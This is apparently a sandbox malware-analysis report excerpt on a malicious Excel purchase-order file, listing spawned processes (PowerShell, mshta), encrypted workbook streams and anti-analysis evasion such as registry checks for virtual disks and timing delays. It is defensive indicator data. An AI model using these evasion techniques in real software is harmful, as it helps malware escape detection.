          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: #U3010TW-S PO#U3011PO#3311-20241118003.xlsStream path 'MBD014EF417/Package' entropy: 7.99626852364 (max. 8.0)
          Source: #U3010TW-S PO#U3011PO#3311-20241118003.xlsStream path 'Workbook' entropy: 7.99877858788 (max. 8.0)
          Source: ~DF7DC820911769618A.TMP.0.drStream path 'Package' entropy: 7.99441817726 (max. 8.0)
          Source: D6330000.0.drStream path 'MBD014EF417/Package' entropy: 7.99441817726 (max. 8.0)
          Source: D6330000.0.drStream path 'Workbook' entropy: 7.99834135346 (max. 8.0)

          Malware Analysis System Evasion

          barindex
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeAPI/Special instruction interceptor: Address: 7731C7BA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeAPI/Special instruction interceptor: Address: 7731BFFA
          Source: C:\Users\user\AppData\Roaming\vtjrhjiMemory allocated: 1B0000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\vtjrhjiMemory allocated: 2380000 memory reserve | memory write watch
          Source: C:\Users\user\AppData\Roaming\vtjrhjiMemory allocated: 210000 memory reserve | memory write watch
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_000007FE89AA3122 rdtsc 6_2_000007FE89AA3122
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
